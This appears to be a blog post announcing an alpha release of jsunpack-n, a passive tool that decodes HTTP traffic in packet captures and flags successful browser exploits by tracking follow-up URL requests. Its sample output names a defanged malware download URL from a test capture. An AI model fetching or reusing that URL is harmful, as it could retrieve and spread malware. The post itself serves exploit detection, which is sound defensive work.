I built a basic implementation of this concept as a new version of "jsunpack-network" or (jsunpack-n). Some of the benefits of this technique are:
- Tracks streams and decodes Transfer and Content encodings of types chunked and gzip.
- Completely passive: Don't need to worry about User-Agents, proxies, or other tricks that attackers use to prevent analysis
- Detect if an exploit is successful: the system monitors all URLs. It can determine if an exploit would fetch another URL and when the client requests that URL, the system knows that the exploit was successful.
The source code for this project is available from http://jsunpack.jeek.org/jsunpack-n.tgz. Here is an example output using the test file (included in the jsunpack-n.tgz archive):
$ ./jsunpack-n.py sample-http-exploit.pcap
exploit_watch append hxxp://hifgejig.cn/nuc/exe.php
The exploit_watch variable tracks all URLs to track if an exploit is successful and if it is, then the script prints the associated IP addresses and URLs:
print 'Exploit Successful ', tcp.addr, ' from URL ', exploit_watch[host+url]
Since this project is very new, I expect there will be a few issues and therefore you run this at your own risk. I am releasing this code as alpha/unstable, because I think that there is a lot of opportunity to improve it.
Two of the areas that are completely lacking at this point are
- signature-based detection
- pdf decoding
I am releasing a PDF decoding script with this code, available in the jsunpack-n.tgz archive called "pdf.py"; however, I haven't integrated it with jsunpack-n yet. While this should be a simple task, I'm still testing and improving the PDF decoding, as it now only handles a few of the decoding techniques I'd like it to support.
Please leave me your comments (good or bad), to improve the project. I haven't fully integrated jsunpack's algorithms yet (I will soon, I promise).